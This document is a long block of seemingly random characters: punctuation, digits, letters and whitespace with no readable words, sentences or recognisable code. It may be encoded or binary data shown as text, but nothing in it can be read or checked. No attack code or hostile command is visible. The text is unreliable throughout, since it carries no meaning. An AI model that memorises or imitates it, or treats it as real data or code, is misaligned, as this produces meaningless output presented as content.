":":a|"W$c+2 R0'Y622(61)68"h ,!:'M~.,	j5#<'?1I[8:;Q##*#A=p4m) Y|	P:4%$u."D?(!6u	$17@1;}4=y	;-3&"# '"0>*6!5*>K+1-.5%&5	<
,2.7		5V  &\_!#7:}19! 2<
,V#i8'5p
5nr0w&>W-Q(;7 0","96"O . [&
b9#\+ X5
~:@S;
b%!Nb	
/2%;w#=' *~ 1',K
/5'
'##6 &$$M(lXc4vr<I/=/& u!!) ':*5=.z;}4	@V&/ w2#l_%"(74&<9&':1+ (Z}m\W5 rYI$R #3>' R8D)! "	v;
&2
T}:*5- - e %/]z$nk7'??d	>2g3+;7#.C&= &7,#4%+:>5=(LU	9
5	&?3
9[0[";!1A+.%90	+C'1")
)m
b&* W
c=#=f'	/Ft?0'!2$ ?<<;%;<%7$#!Z$N.9,(#N_q,o,a;.P "+	>4;*6N3	r+='e>PU95uBe6%/$X20!R9=({tR]!9<?!3gy[9f$("s 3-5;0!
T&1Xa-ci xQ/@)725#- 1j{"E'* +2/#/
#$2U4#
 ?
 ?;;3'/
>	)8h#= \  834#856:X]N5P.3#/%NzPm9bI%v).VI%#0>vR4$=;*_3&63-'%Q;-6d1}517i--y!-}f>na!ck&G1p(1-	#-!"*Eo[3?j4d~;12z0] #'-$4U#.XZ^8; T4
| $v	/2 (D='r4,/.!L42=D"%#Nw)21vN:f@#/=&T/15{?=lV6t!-<1M2p43+#4"g#22MJ3 %!~?-/; ud5!9~"\L;7^'>i+. jH;6."
7^c4Pg5$9T0	 ^20:.)/
. s	3Y"}G(	.95vxs?)pP.;*40*0k<(
|6Oa1$7	 Kb+Nz9kFb' 8g31)!zl &{u\,N%!<<#<8![3/83  	8>5.6&
<).
	2#{!4f+Z-<568+|-%1'C>J,W/}
<#X5  Z$=,K'r$!- 9u,5	6>	xk8)"=4<s#h
<&37>- ,R 6,$:%)	'C
1
#b>ud'1*
=3j1$5*9
$(	4,9"%	$!6#4 !#,GVf3> )	"8	7-6
P<!)'"
<fzN |X9B7>[	8ZV&{U1'\W")&$)1>*'-m%6c+% J'& *96<2+{53	:33rR# & -#+!(}'5%*#'-,a-,l1udF65*
8@*#(	;|>.z#	{<2+"#
?4*0	=4'9U 088~V>K7?U1[!%3Q!8j8e_;G)"?7=b<t #	<#F2.=$*=R	7*5
9 )2
 e =l
#-c8$ak*=G8w|-Qh_?W7
kD%e24yP1DYA8}+- $}I=%Rl.uD9?"%t,6Q-!:S3#?+D,307+`	U^g>@$H"O{3@1e2y{#-n#52<=1h&	'Pl(|4&	>$	'	O3.{1+,X %:(#c,.&~U1
68-*`853a$. 
Ju
^#9I7/.(* p>+HQ
9)Q
`Nyf.
*+%356)^ @="
&$))e$)/"\{b=40'%\Cv7f-"!!9}!,%	@aL? 	1 %^$n "| Ne2
=60'4@7g8R7;_2&W#3D!G
 )6*	o	#!3:*d
I11d7/]i"_b<^40:j1\-#uTf-wV"$b ,%	 Z- $85*(+nx' 5,f
<&N^78Dj
3*Y6	!WC:d'
 K(N(z0	k7;I'4<$==?l0#	')567"*	"9z5#	1F R'("u%<2
"
&$<<4e$<=)!8
bm

! > Z;3U M!?/` %|4=
]
:Y
!,N:>!#484W&=Cw5 R|,<yJAa7Wk4I.6#75e!)&f#m-). S;q6^~&xZ*85).<lP% R9<J:jo!3/1@ -0_7z_&
; &
 8`#*afX
 1>$E!
_
!6u-f1!	q7#>cy#3"<5]]!&!(?3!+%68P'g0:~'$}'x,>S'~eq<~4J5 BR9/5r^'8{U5_9f:T6dYld%1cmb?|
3/zNk^{=i#'_fz_A3kkV2|	=7/-&!V?3)+%6u' 9 9~!d<vO&':=/x B}7"v)dY	:0+:H*6|H 6K
.:d:"%'pG4CRckf>
+QC(9%6g&j#=5?{"[9zz@fk0?/67!#N h;,%8>	@$L=<	)S'7z)gzX#s'M>0%5}iH/g79{U1>2m(_<& 837-Jb`f_|z2-bNy^	
Cw7oR6uGp;(*-g >%eV=J2$&H7$&yUwV\<-9 0A,Xe	/<7(!8
b#+zNa
i
>9I"7MqHAe? $.;k J9%s36Q
Y' wvdy .CN`|
8+ Q9;$)r't5!1<$
#'AQ\Cw"!!Y/Q+h)5q3#}Zx	`5.P_aY.*Yi	R64^>r?66dV;+4?W*pG.C9(bv;t+QC7)%6g$!d
I11s   9;)(+ {\y<",XO?<!*Cv]fQvY1X~5@/}L;N)a
t4<7+:s(PA055}q7/18Y zC|~_TK-"s& @v1-az>u'd+I"1/d:@w$ "GGf-$Ra]?{t<j
%"{6]Nr-J-6 fZ8 "-)q(!?
[Bt>A..<"m&q a}<!<0 ;02q^dVX^{U? d/s1#?R(i}?	QC8G%A!d!	0V6t#,85Ljk7+"1j!63##"- *% 9)( 	6, (gv:('#=w6%P7V+=B$	
^1*TLb	m*87Uw~,D>7{t#"._g72=>U%'C&Q@<-7{2%2$I?53#	='$-1(3` "-,&0)	>9v"&<v;5&"
!lY/
#797>["z0V(*+; +\aH

&{+24) f/sCk=56a7	%+t ~-!t.G-S
 	E:d 2B:B #4	*"\xMr!,g+!a	5@8 =Tx2M
,C83!"441'&	+Q,t^ ?/#:L2>Dc]L00.,<4 ;*q:,}(6a:2/"B`hxkR.\::25<f=$"&5%|~426jP)=X$!271A/(8\=6 3+&).1%&F"'us5H`g5/1I>D')&W,)7X4p|4%,96H)w/_?9y2e$M) :&0>  &g69%'M(Z,b[`&,6 /) L9. ;^%YcN
	,>J&*;4?S%"]<$*V`>$'sW:a+D7
/(8e[Od49G(s#d+J+7\\$6w"{=?8d}g!3>%3+9qW"-8;`0;$59	D9Z|:0Pv]446)
>#I+VL.<0$/.8 DU($
}v"/=2f.~/*
nU?#/b$+}%J%*6E5"<+	T.'(%1B$a;8 <>4-Sb(`#6Z)
 .|4$/+&9.)!)-E"23V"R%9
&,+ 8"5uu
);:k?38>)53! '9\#N#<*~7-A;<^&)*x9yIc58&4<}4	&/&	%mBy&05'>>Z:'3qp!(%-J;6*
d3F-R " >2oY+D74xB:!) '
%"-'?	T&|-)L`'.?k1I$!Y?>*#6$0,
&^8>d*1#,(?.>K0I;~0zT3-$!V(@SM=+;#]`9O)<#=}:	z -$5"q
$+-?>:$*b! *'82 8&'"
R{;"&4=4Q' l 3+1/|="{=(;,I.(	%	x#&7%-<.(%'CaRi`>/s'%+-'9GcG- 9a6-_"8	H"G+ }`~4;|S?).#|0N~Q<eWG! 1a	c-T|+-*x:"(`,<67 ?6}z[1/X	*7-	2|t#}/X,1>kD	. =!#3X&;\>s*|<1
  2Y{ )!q"!;&33!*+*3~2,Y
4e5 ;<<7&JH2%e	$`&."7*:5716nr5?# ?(2'_4`&+.*
0,+>|6((8#9s?&j1o{:(/]%)M)+B :T? 68 -*'uO?{	4G?'50:6e%vH y"{*-'.=J/?01w(D	&> /#O."0 3;A6_zaV)==vlV#/!<?
>a-! Y	,0`+"v:#$59,S
CG<v1/%
*m)2`/=A$v;5#(0;.=#%=6:4 '7+>V$1
 +	>x;>)9 .4$d.5<zr 2G/ #/+Bx 04/#$WV5  <%516<A:D7#f.zNa>$

6	/ )"!.'''%3bWJI?<;IoHS&2Z8&=H2?:62&0#*k61
/W^8}2CY3;\
;;>
,?m+]vz'd?$q?D`? +*U7&qwyQ?u8W(8 ^ " .:0,:	 z+?jP3Z$C95
9e 1p"u[16,	Q|:	?:20* 2sz'r7^:v/{,	3+.`'V*=2&+*2!>:2=(sv}$r;8?95c&H?:;848?$#=!'%s}[5>63162:m&US)s'| '26aj[396.b8 %;)j*_	p`iR<()=pZ'8#2}"<HIP#7,%-[m%?{*22z4%;+R+6Qa-2z
we  , EL>	s%&=7#=K ^61 1')"Zw)7,8&2{'(	Gy2*U(&1UC
=)+.uW35	6,C$<>3.9"18#q&8#1%=~:&y#>_ >6+	qS1?70 "7G>4#Tz)`6$1&d5;8s1&$=(f:59s4>(*59?#9":46(h).>%'C*
"f7y.?*.R/%03,(aG70%5
59:|=AH"
y85&T>?#W9&#t, f=&/cQ)G0]2+ ";Zspl 3<kn %C#6

rA>?`)=2"#+)!	B2(%
'+&
?@	e$#V qde$"x&).<976/. >	  &6.
*74|_6 ><;?[&;$:7;.7%B0*#:r6~1+8p&|Ic  !,55t'.-
/%&]I7*1'59; eA;k< =9,p:P=!0f%T8;=)$5<9'75dFVH'=G+72>01#0$9  f"!,Y!&
s/Yg<|",]{I#%.C4l&#&7.F*9c>cF:j _C02.+zRg^ {'?BZ** ! 0v:(Fu5'r!I?%2<87_<a19-=%:&rF 36<./"
U)28:X<1;s`
"g&W +!WJ.0/*b	\y<`5#!$,)70xN~P:9. *' _|5+O7v+39864&z0N3~$(4w		*~"<<u/+|9!-	.25!"*MX0*57|?w'`$z&,N"/$21^<,zu1[Z(;2J:D>60#(!V/?p83&(.s>w)f!:d'c	z,+8!\6$69|.'9(+bae#5xZHw|
h+1.12?>P36?1yA>y"!5rH*C#.x[	99 
|N
U-&n5R+0;'< /W;/61==iM%		4	0~_.<q'5 &#>?^6(:=&94:hV[#;=-.],??*y{F!8?20#6&1"w&8,>$!VB	\' ;u ?V($^d-T
+ 3	K)/'p*/'!;%"1*_=,5?u)JU	%2u,
 ~ !'=#)! 2`$Y1~R1!3. (%`>}E	=0N:x
?$-;"*:i0)*3
#	4[.'';"f1
 4)K#q4( g//5;vEY",;<1<E`}2&Ct)	6	'lI:/'2-;)#0}#{?0]8  *-*?
R<^+{$&  ?4#((%8t-#"uv5S<89=x"2./$=>"#Y,C+9>'%7)t4ly1';<r6$<=>-'d06-t ; q# 6, +	<xS7x+Z<?9a9$wVeu"2&X>4!>}!2%?K p:!:>2
'>-"9^,C4"?r7T<}":3:-;[ !!i:5%\(2(>* 3=6f~#@%#y>
2+Tt6ZY,""1g#C6?4H
32> u3.+c,7'P
vF

a,)?8u7@4; ?#v&lZ!:P>n-C?:e>/"647=3&#>D :=y% /X8e<9P<+,7"))nB3=(5C>%7  ;$>{7.:'ITJ):=T d!D5z0=%"!#<(4&8qs%X<((D#$^h!1	9a%!W-k678;"8{+<# yTn/S*YC9$6\-g*0=7T6/z7$#e$ULM/..0
&+	^ 1<-5?B./>;-z}Z$'Z A9	z5/;0T2%+!'60 u20>Wy1+ptR-!Y2 12\0 aUx.*."?
B$q34 :K	0v^/>777
,2
\T.$:4"	9%#f"k<!9!6(<)8?4X#
~	|,6
<B146@ B!$_4&+7)W6>QA<a1]J@#()'"u(#TDMA3C) !%";r5471$$/$%d.~=
)t$Ng<+?)r9	n	+$?p'1*+ 2jq? x'S5,2]*q_/oe$ <="79.+	)P+!9;18-&#G02"
@XVQ z1bw% Y480hP< Ai'm()&"c'@!i>,"o};/ } _fJ<08,j 64`+GV5v
5z	,z:69 U:/
*1()$g$ ?,c &(!PJ+/3s%	270*!_:_>(}@	 p!?"v!3$c)8d_z9#"rs$%#0#b+J#~0d'2$	XC*%[JZ7<O-',&>1i%P:>"'nF"M6WWXy!v 38si8V0 ,.}-B7%c  #2*?9xwk()r5!;=*_X> 0''  !" #{5CYy;1	20}5k{O:=<$4jW!a,<odh1_)C3x	l+A%-f<6qJw>[%*M23i5	Wq5:>6,K9z?B'd!?5
/)@E5?+ 
-d&5)=8*PA "5Va797A<a96V / <=!,18 Cbfg:/(z/,-7-yT:
<	$f
z [( <#3.b11%~ ?W42!xwX:-E3%c7p=tR^/3*5g")zj%<;R.Q8H`/Y2=*J7=2>&$1 5|'%#R#C))h	R2=4%48/.,W)>
/:* .:q#R	S! ^,3;!*a$?:S!Y-!,?*y7,:8a'3" hVe*<-67}"/?RD`FI.$1!p[>7Yn 6"2$zV>/ )2
(9m:/f"'B	U(v(%'<xr7`$50	:'~\	gv+ux"=9X5  g R%T]'$:4?/- }xC6!rMp3}4(3  4-,'eN3c:^L& 5A*;!;<s,\2* q9#*(?O>A'!<<4
\|;1,++,	}*-69D <,id%&fg-Ls0&<({89#&	s]V 32[1u
!<@7%""&NL eZ  w?!P8<(=ZM @-*c*4s497]-,r$t / :!* 4)?![#lt2$&/=#P6!u,1(lcX<"9c2p@<Y:-[/4#	/p<#;&qf:b89!1w78hMM"UZ	"-!'1B)3Cn>q!9!1# C/$7( h\6</5?:!s& # B&*q('3g*(3?;?R6A.7=X38/6237)ST(X_P5#  ?6 ![=<:':0*,
+7|4-*M#Dtu4eR1+5=;0!&.5	.'{;p<r~I:7}-6:^ 	,=2		GW-)=(3 :!'4	Tx \p'U>&
8 :Aya=6#9V(45? q<y4SW;:&'7- Nq)e4R2_,	#52(7*k6}8  $Ba== ;4/#:nP:-<.,5k)^u)7<7%;a$
8|z
 {0><&
?)T$#C/ #=:Q7& ;9+*4$572?6z4\%@U y8":J&H!p/~sD2*z#%>.,+m;#',v&3$!g	N <-^!?7 "<1?)]$*!+%8u#RF!x|^"2(!z::rF=+	"(<@3$v&&4?T6
?40"2!!%2+68X <	p';	59 ;85#?%;y&'_ \-(8#z7' V~C|$8):1&	<uPG\6
9 ~-~-a4;-yCu4$)>t	UBM" :3"
#
7S!,0
5+4z $r!:$or(;'YD.q$$k+"#^,yPp1,:"8d*"
c&J! R4pt
$W3N	<(;95=?'#.?-* =/6)zr++ c~7P*D
m:!J6dC9*
#%!6Xo 4bl78	'-16i}=9s8(.g
$]'1'7/ 	 f910_z%'`#=1+,v 8.=Y #;Y@Cy.^z2LU +<5; :e c&!'(;vvp^9a/,8uCz#0'*#J8j,>-`# 9s'o2fx+R ;Vyl6N6* 8-4( (::T]%|4($l" - <{72!~&@	"Z9,7!(;##t8;,P&2~(GN62-1-7BJ-=60. +h
	&>+9'"d+_$?# _."0,%?r}+) "7|,3| b2{1<'+S!D ->967^-+g%"+;'916+%B?8>0;>;>!$/-Ea5>2Wn%!e(&o3?R /ygJ [e)? >4O2,?7}wW1qQ`;F{,Zn
{ 9P
.<#u&+.,G"208g3#5zYL$*#-:&?<!|B",0-
;c%4.+%(5>(146;k>'; E;SM)#!Q (>';1<;1fFrI7',=t;
&9>1%9/_9%		8.6	8#;'3=:=>:0,$'	x,e3|)?;+!%?U =? 4o	#&-;$#}/g@<7|>5J	3 *g1/5T
}<3!Y>oO4<;#%%uV&cs6^#v6rE#A) BrG;,,'h"'D0:<|t2^A"$_;4"	d"72]mO1|2>X$+
"& 98F@+z=;3Q~4h*<_
6c4=9#",.B!-0##*M;UH)5 ?1	y"+)> VO.);m:{oZz	5T2. .=gds.#5*9fU3.q<"z'y!
11d!4/;++~"%%1Y578#-,.-0)Q!"*'!l	% 8>U N6)2k<06%)0f4

0-7U%=v/,dF%#8r:>jh$  9bc+-tX?'8jUy46>	T'r20*a#b;b=<q"&j44T;7v]1 #2*MAQ=	0(=0#<Cc_ /Z;"2+&Y5`(3#9&+/.br2*{&Z!,
'.q<'1=
? G%!U4!<|R)56"" eX()':<]<1==.+P""9IIK%,,s<+6P
2;^'}*#', =0<=:	+	:&  ~8]1g?,;q(-u>6?Ac4	}B3g)'.
(6/
 =	&z5	g
$X5x{>RS= $i :%4, 8.KDS4 },"= /!{9>m%/))Y>0'i9&1p-y;: .)j4"X@+	'?x+> -1>Y$29110=$~NU#"2/,1;$/*d NH/|&%#**x;"uBtt+):(.-/'{$9"L3 *:(?>1[.K24(({%, Gud7*od`354Y 0I1r:8==Jd"b"5 zTV5\:!8Pkb$y#L7^"J ^|"~.!"%/bx(Q9_5t(&bS  34%5u9}D	+a s6# l?0g) 7`Pa	?-C!V(3,@k"0
?"~'$&'DY9:7UY& &()%&>8(9B
P)7bsU|hU?d,2*"&76E!f>3/8N+5"'7%1!-,/"v~"
1">*/"x)'`["q"  
6-88#
,68:920s7)5q< )=ce>%=Z8) 0^]&4 w"48-n 83|/8q41*'!:	<PGjW |=(y*(8<[.-A+(9}j{3[Z.!<*p,-9"?&81r*
44}4r~V]),>?;3%We 7% 4"r\	;j-*$/+/m65n,#PqJw:=0((G3?1B/w8n}+-"/7Z8 [-Gb<a~,'Y3(."ez"%f# %&$':;'tK-$#C(
49:U"]r!!#($;#2R9d< ; 99o;du	:32&uB3w=*5}).";8'91 l<	)80+6-'G&$;g*+{/6,8:
)  9"X 6; =y&]}a>(%T+]?,^%Vcz<2 7Q.<*2#"i"5	+9
J2S(Au&7!n+&* $497- X6nr"z8?a|9-D/&+b,dM%C+.ba2"!x(9P87!e"[y)K6C3F~0Y#<"-%UU@5,"1-^)?]\:- 
<{	<41R$(&qr.x,)j3"$
)'34)'6d)5;"(k1@"7)2&#:|:w=:4gQP\:{9#*X2!9=r6VR+;3$<?<[0"/.rs5H5Q&c	W\.1'v<*	b;
"v|o(67,2<*)*88636+g8+c=$*$) 4js=);}]{7T ?+P,6# ~4[:=I;e< 32'	4"'-6%-uq2&"+
W`?v!>T
!>4/#5oy&&?]21 ei5! ;qb""\9  W9-"5935"#3`[*!	>Yy U( UW4~u;4%-(U!CM%%6,^A~.* q&*X9v !>4S+
 u>.06yl!8,33-tG/\%>6#=Q,5$N! 05%wX>=*\$c*1=q?6w 47J!|9&#)PA?U z4<4J,7+^G Z.~47<$>b>r.;r1 ,1.w*
P.CdV*2=DV,{c<6+0e)?8 w-Q { `<-n% %X;	-"-|$:z	eer4;;7?u814-3|Os."a)8]($!&,r)'.:%*8=*[/5$}h=31	 .?4F"6.,!$0B?/[CW:[.`)Y(;
h;$ :@9$_/4}3 =/9U:.6|)>	= )&^a6 5-='Z4,Z=m%6>0Y	y*U/Ef7j&=97">:g)Y05V<=] Ke;*"+x}C8Q'r= *|Jl =Q!)*D=:8L"=vL	-0*zo8>#Pe1i/483C'<o,B/aHR
g.D<#?Q3*#
 !4?8
|2. 7&-=[> W4#7j-j3iuP^}'7<0c	jf:g2=1;G*R\2pR&Rs!9022u7_P=*	?wGb%&(-~2CUu/p6;%+3T%K#W7V3 6pVydx06	&W<2a5O(	~*w&(,TfgI} *89)b` b<&495  4(43-$	)4<z-7y<
;V"_)|#)y 3 s0H--w>Yd%16	4 )23_!z4a78X !z/	?	4:Vu_8'$x0XygVaA/*99J(#g $Ba>_W[n#7X]#'6N6Bf<z
H( 8<b2({cs=,K(QM%;&.V*j6:^'9sC"!v2'}!x
9|5;(k p!Gs0="=;*/o9"<+;}U37A2 q 	(T~\ >!89
67a0
i;" -*  .#60)B5}@/ <8N6	2:&>
;)871  .>+
'-14y

=11$tI)8f,5kNWc\}
I2'7r1&)-4]f` "*( }6$.`j8:['
x#t%
=MWIU[2z3A'V#p3|0\m;HPdG\Ne)9t$/55}j
<(w!w$ *I)8;z$)7k7{#$}
%g6=Ne+'. #3 #"#& 1	4"
=)"'v)mFu j),&WI3;5jk'-+p;j.\;2=\
KX6(v?+ =:&Y(H6^	-! $'))!$)a'+{+}
;X2'J-./MTqud0/\v"!B!=	6)|=9"_*}u R?9$J0p6E6 JPp;x>+Dz#`%G
	`+v >
'"12?

'<GG"(4?o#{c 3=X4''&8/Ky3' =+u1H&$
L(	V$<u<l" d:06B8A&o886" ?"H`:(/{:0)'?|:1!4:,
=1++$*9&$(|4-l"j	'p6#70!!-3, )+8045$ <0;) =	> <* )	< 079/*#6)+ :%7
'#	0 >
#3*4	=2)n'P)9
c'(r7.5"3
")5#42!#".#3#*/8=03%6$
<48)'T=e<q#b
<#/379#&,. 6	5,<:#+	''
2,#,> 6	 4\,n
=3s
s$*9
0$(!4-1"}	$g6#5|!#J-3) ,8604>5$</;)"= <  	< (4#69/1#6
2.:$

'	17 j>p
!_1D/	=3  '>)9'( 7+"
'"5#59!&.35#*8*0126$7<8)'2=<#
<&43788, 6-:#S	'_
0n#n>!	!4,'
=4 1 ]6t.) $17*?
.y6632*\- "(	N`-.'X563Rx\	89_a&$' =.
 	602,@/;<? $&C.5 "
(.
	 +:(*r
	*N4
$ $'(*$"$=7u4 1<k	68E	#-.*[,	 YX#/=-X%$816(! r a
(:A0%"M7Af?NQ4|l:=z@?UdDYdt+`Na	`f@
#7*$%9 ;
(i=i$:_) l$7:)
636.b&:T-]3tv X. }(@58~- h;=PW)~n .z#u
[R>0PJ:or?/{dH U{Ku\JDT]
Ys.	(C# at	?Q] CF8]|	Ca?{'
| *2y'i
4 \e%ac	Tq54eH#'-"- ).%#16;.<	85$/*"+ "
!:0$2
%3/? *8>5$6&
&.

"  !
*C%55+
)5$	$)'$>7":c\
 zX]?/Cn&#0	 "(1<064<R=>l89_<mxN}qdBZ6^MUj3$@A2LN^p;|h"1*"
&0*
6 ./
	.%16
#1hd	. c9)4:2."15+53	+*Ct&1v'-:z6@:G&8L	I9/Iw-i,N.F
:'?5 0)8_~C &2%dO*
2Nx*

&.	XdU5= -($4+"\93&Oj70:|?},#	A#:| JfM*Gb+'  ~8a/,'
9S'z<u=.(!R9C7;5!uZ{T(.b	bH7z:z?3Re">}Ds(
&oa
>{C)l$?'*P7vEv{X4'{66%B;[2]}I1;#$(a&5_gCv*c+I6L3{G/
Uk	1<%J0'5ru*(%N,(c2|$[#S?s,	=Qb/ "17
I-
*"3<)-,$5-&]*k7<
2&@7<H.'#1-&%#Qz#*[1#mO z<vF./W#!}
FI%?}#_.P""a/.#"1>)--..x3d5*24?=-33 Gf7$8/<	6?j>ePqC1B!eA7&X ()&! u6(H.5?&"#g
  [+<b 3csjd:<15C>=, ,>::z-,&<
72 9-.j386 
#@ns"'	'\V427? *z#G1;>#-v!}#WZf=2?9<:4i1-3:
bxqz $<!^721?'@$^0,B: 
;_$0v"." @5j66|	<>> >,'?,(eo.w%6">34"%# 1'wj.+## Fya`XDy@:&+{ +H;-af[} N}'d:A^/7?wk$7J!<6\1
`=!+!n#6	&3%}: H8$})'$,.54($/"%Rr1(<#	b*W"K?~9#t1Mu$7z
)> $@}6Y (4+/*"$#:n!Q)7tkC7$VQ-++"15{.2|~#-#w:'#w|')hx@ +*?(<;T=[`/+(':3'! kU	?D )%	U+5Uzw
 :XP+	$-;$f$-=@*:o.47$
14B "79r.2/_2;,:i,3q	.+!@+_>m"85#<?:725m7 )g,T2C&B# 	'4}3Q1(d1&E618?5:~-gr X1@9<o"^`MNk!%~]- ?-0((`{ / bz@7&+-	6
:RQyNn%",E
'9.\1!`63,<c_%c#2CP.=`+N!
m
1'c(*53$&%.6%= -|1^61*;*m{)4*s
1x3(43|5.)a3)0 ?0#+g*
	A%<6
U.&0!259t=?M4I" zt"4/W+/ %?@
<?	**56
D!~!1p v.&!(6"/Z.,=>9(;*n$o)*/,8+{~L<7>''7`0':7#>/7uR;#;/6i/7.'4%\x/3N_; v;70f`$H0CCn.:?#/
"0Oe.[2$K
s!4/|5*72&E"9,rX wd=6.>Z$4#i	W(:
734;: "U=,5	y3 
%z^lB2#yMe1^"<@/<x*5|/Ne=g`"O>[09; 7cB$X;L\21
K3Na&,> 
a9=d*+"30J'X::?U('['J8?7 =B=E>R$."x/Q!#G&f'cX$'64
-g",
7~b;vU'  }[K&<$-8<6&X#/08
";b(|.+}9 >"56;=.64)
7Ev[e~6""1%:*#Tq%	*'^X: =	 G:2#';*= 8 %<Z1A54X%=-T^/b/>0R &l? )#*2=> <7+3=(X],<C180$'9z 4iD= mK$?3;#63N
7-zIV0
m4A (1c&L';T# 	{7:E92Ah#&P#260;%
	)#@*V1x";~+MC)97Ba+j
-=41o4T)q Pk7&<<CY 0?Q3^ -y-<P1G9o=hP9%24IL+-z;r=u ,*&W0/8=tvA+4=U\2%"%
 
Qdm+= (.t)'-56=+84%8!4^!U7+Bo>|*1
j2DK!c}#&j)&` "#)#05+4$
/<8  e<u*l &
.Q:0'7n2z0[78R;0Kz&`Y{)(!\v >*.
YH63:j
%Hh 	Rt'?;"$)2!Y3- 9=-06B=:'?>12l!-:b.!XA
-,
 H-<tT&d!) B7	1$!7$L37,z# ){3# "/y+/??Au?= 4{'91_3 SR	=G0
k)E":z #'_jK<.~ -*=(y&<gz"{ 8'^v=$; 'uT^I>^($8  
+j	F&:$	7)` 1*{(-4#4W"
- 3s|!%y<8 '7{08c	 7'35+=	('j% <#8i1H;<:)".	A9;I"/$g&+Na/(
,'9'}  8)
-(:"r{/` Jo">>s
 )3.'*"
-;9% I)8A*:21#	G"#-1'$&%9
2=)%	.4" 8a	e<.#3
<!H379L,  6
-X:$	' ?
1#r>	#)q8A+(
=1;$T*9<$(4,"	%%6#7$! -73N<Z8 !01)$
 !/8'U9=nv" sNf#6?>M/ o,6.V ^
'/
 >>
&+3A*6	=4;	'6t^92$)a497u">`
%X#x!.?f3:  )q8:;03$$ o<&@)
Te=%z<:{#4sZ@7m,aK"6Z:& 3'z	@X(w{(U=j?a3`-=n,U$'=l/YDm6%|'U;3?<TR/| \-)%:d
?, M@	^G:w )q;,6
BM r&r,2;el?=z-		;&Q	3D1Q 2D'/bMC;a6&:1<!Jic+"'!R 7}z7$X%1.)\v?O: -#G-jP	#eJ7164*dF{(9&'a;2==sW?8:470#3Z5!(#4.`.7/%H6z;  KzV 88Y50~C"'8w"#]Qc.Ov,*\}3'
@A&8#/5j}I8Tl,+8<F^xR'*18)
~~?vT}62#':^^3p#^_*TLO~(F"/
A !:4(~ l
z*na &9	-*w.i$ 2)GU?Bs;|<c
3
 3 9#"jvyI=%S2$9b#$/`	/89$W.::,l 
,.EQN1#DZ0J 4 9\/2~O }
'-77v{
/$*%8XfA!	U$wd3PRGG*$?}?'}<4zk2"=Db[6$/y+iP(95"-3'=	&)Rk4.>[=)mAh>3 7cU7W8/)|l1	0Q<		1= 9;Muz@65/$8 w$6>,-T@Bod;\=k.#4=&Y6(168Q j+a1,B* T&7H5+{#, 3>001;-#3U)4  >:Kd(+x!(>q|x+(3j6{U87r<$X_*JI>*5("cddy6E!|G.-"?
~$ #*mb;= L'L*5A9+w-{"|**><*W;_"[*74^^2M )/ 7#D_/}{!?	1W--yDs`: &-}<8'j<Hj.|w"T;-a 70?;k
4Mp@#209$-3&%6=?N"-)$	>  $"	8O37~#s<9}5 +9+33	Z{&=c4' fR/6}7/
Cef
@8&Cj3y^	&=?! Y] !2?9"9r 5>9+=G(.&(&fZ%V8=nQ~9fH6$"&T?9'.aCfs da 6@q|
^8Sx;	0`R36?6	,z	f(
/*[ua68!+,)1sSig-$4 77#';j312 %d.73.$T~ hT1	](), 44L!cv:{U9qF6-S' =Z99Y$,RLh
6"DH.r;C	";+?~*s /P	%==G8-$\"'
j	sD.84da5;Y#V 'n]|##Qj+20;!t;4"|*BtT0	#>FPB2U"6#')x5_;35Gf#
7Q j9>#" ;Z-3%,`=<h%o;_^%-:1q`{*s?{O;:M5 *	.87)&:!c;2#~5N-,|<'<)AC-G}ow3>)/."7c:<U'%C1/1(p!
$
s5)>_9G39.:i 	<86(=B-.$A%

 ! IT^t4)#-?//f#B*4VeT! KS[%,0(6#i,,MLF
	(Z	?8Bg'#8*>"\?1'#.6pz?0U
\;7d8,40}
	;?!-]p.';};a;5q<tx:$21 i /	)7c-L@2&
,;>-/|!0!
[4z (?LQ>!:+)D:9	q
?wb.}%"]{$
4!?[
==!>8<a+#)(<k;=F)C  -2&50<- <#P68> 
1V5*41=3=!?M;L<'5%g*N5#>s
8l
=F8=g*- $':.;Gi>#{] *	
WcX#R<-o")X;{<?: 4NX$+zm!.+[%<%|>$d##TS-&i*}$+)'+WAP.E'!G8;V~>=
~

rX1iv r,}Tj&@9 1~X ?:n'=	x]4v<@ %8%%Gj)2Q
u.%.2a[7(tiS=,9?T,1K3>+*3S5,!*W-u0#H!?D	>.
/$?*0*(9*;5'_z$] %_=7d# {,L7D&F:*"&%|<N"%:)-&$,;qQ8;&07A:	
%)?A+=1	 `(*7n2[o3^!%_
R0& >07h.b%;3 )!#
3!/#25>=!+7t%)a 8;pg%_	\%sV_/lb&*g8# 64SP%=5% cq9+7`;30j>4R;b<Fb.+Gw" 9+bj\{&[n#'[}	)5h<
u+,Q

.r->:6r>$C
%'&#O&9, 0)33*(	p2Q/ ;oIU;5/"0+}4!0)}t:%%H")8)5:q'! 9Z39!8'*|BAj!_)k+!$a,**&r	>t:0{@06>a8C>$>$: :
O<W=:d9;4#
[|')"
+$ (?v[5+tX[
DB'/3*=*^'0+ a,,z7 m
>b4:h ;+X<&{44=~--uV^P{$,?0c D}r&~;a>8r+q2Wf%2P9
&L~7|=!?Z 3)##	&P-  	8n5 )>|*_<3?41 :=$>-/% #(E =[;t#9S9<>&~$K4N #?7d` ?$0 "7j+'<81X='{'5*B#%2?4z(("(5	pg$.8J ,_  M)~=s)$	 	?pq 19!:D!#?(m"1 +)g'&2>Nu%~#
3=,?5?{SZ8T+2+)%/*4F8\~S	J+T"/&#.}()Q84k4	 |0+'Jgtd8'"`N"7=? '!U(%2b?'8w/ o0400fI7?7-G8e(<=:$ !,*:rU1 	}.C8-	X9kL:$$0	0;b4(|"U
=sr;/$60=!	22R2 C2#"#84x</"(e6='f+$9#lT`+\/&/02-3|<=8&=:5&#<635}6fP?oS	{59~0) V"=.
9f'^REM;&w>$f-
"+:	v%G<>![o'a+'{!b $ "
%_/6l"'Iy'$6tB< =f'	%Y#!6G+3V)$f!f=;"+## ;K ]:&q$("bp ! 
"B ;R:.=b8 2%R{g-&r2-P8)1&!
"6|b.P2d   Y)dE$'";?V9P~M"	9?&*')c6( ::PQ #=+={5'{">MEr6fTtJ" <2[!6);{e .+3b7+d:%`1c#>Q;/+Z" $#(1 B[0/-%+hy,X.z*C2&lJS/"!+Fy6'e;*7=0 !qi&X)5P J'D/U]w2%
;i 0/!Q&>:Ic"|&]95o)=zU'# 7p.3?R>4J 9Q" 8=*$)0Q )6BM ;o7,R
$\`& 
j?*(:#7!<I.### !&5	'>/+v
{i5"/b =,${*7/T?) 13+,>*!*r1Z##46|!4<4>)
zU/8,'q8(-@5V)%| /<(;$
	22 p)fn3/	L&$4^V1sX$i")+h7{(,9?4/~57lg1kW73? 2v*}?4
SxXD0| J
